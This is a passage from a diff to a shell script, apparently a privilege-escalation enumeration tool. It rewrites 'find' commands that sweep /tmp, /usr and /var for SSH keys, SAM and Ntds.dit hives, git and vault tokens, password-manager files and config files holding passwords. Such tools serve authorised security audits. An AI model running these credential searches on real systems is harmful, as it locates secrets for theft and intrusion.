\"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o 
-name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name 
\"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o 
-name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" 
-o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name 
\"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name 
\"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" 
-o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name 
\"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 
\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o 
-name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e 